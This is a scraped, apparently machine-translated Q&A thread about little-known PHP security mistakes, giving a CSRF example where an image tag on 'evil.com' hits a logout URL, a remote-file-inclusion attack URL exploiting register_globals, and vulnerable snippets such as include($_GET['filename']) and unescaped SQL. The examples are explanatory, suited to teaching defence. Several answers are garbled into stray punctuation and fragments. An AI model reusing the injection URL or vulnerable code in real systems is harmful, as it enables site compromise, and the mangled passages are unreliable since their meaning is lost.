All geek questions in one place

Common unknown PHP security errors

I know that such questions have been asked a hundred times, but mine is a little different.

I know about all the common and well-known security issues such as SQL injection, XSS, etc. But what about problems that often appear, but are not recognized in most cases or are not considered vulnerabilities? Whether there is a?

+3
source share
8 answers

One thing I've seen a lot that develops as a function and is not considered a security hole until it changes the state of GET requests too late. This can easily lead to fake cross-site search requests . For example, your application may have a link to http://mysite.com/logout , which registers users. But a third-party site can add this code:

<!-- on evil.com site -->
<img src="http://mysite.com/logout">

Then, when users load the page on evil.com, they exit mysite.com!

, API, GET. , URL-, site.com/addfriend, site.com/sendmessage .., URL- , , API .

+8

  • $_REQUEST $_GET $_POST, , $_REQUEST cookie,

  • PHP, : .svn/.CVS

+5

, :

    • , . , , .
  • ,
    • SQL- , . , .
    • , : , , .
  • , , . , . .
  • , ( : , : , ..), , .
    • , , $0.0001 , , -, .
    • , ( , ) . , , , , UID , - , , .
  • , , . , .

, . , !

+3

, fopen , "register globals". :

<?php
include $MY_BASE . '/includes/myLib.inc';
?>

, - , - , . : http://exploitablehost.com/?MY_BASE=http://viagra.cheeper.com/myScript.txt%3f

PHP HTTP . Apache root... , .

+2

? , , - .

, .

FTP- .

/ , .

+1

, :

1.

; ( ) .

echo $_GET['username'];

2. SQL

$query = "select * fromt able where id = {$_GET['id']}";

3.

include($_GET['filename']);

4.

magic_quotes_gpc , addlahes .

+1

PHP 10 , .

php.ini.

0

Many of the posts are not PHP related. I'm sure there are some language pitfalls, but as you see in the posts, it’s very important to implement best security practices (like filtering user input). A good start for secure web applications is OWASP . And to be on the subject: Security issues in PHP on OWASP .

Greetings

0
source

Source: https://habr.com/ru/post/1725901/

More articles:


All Articles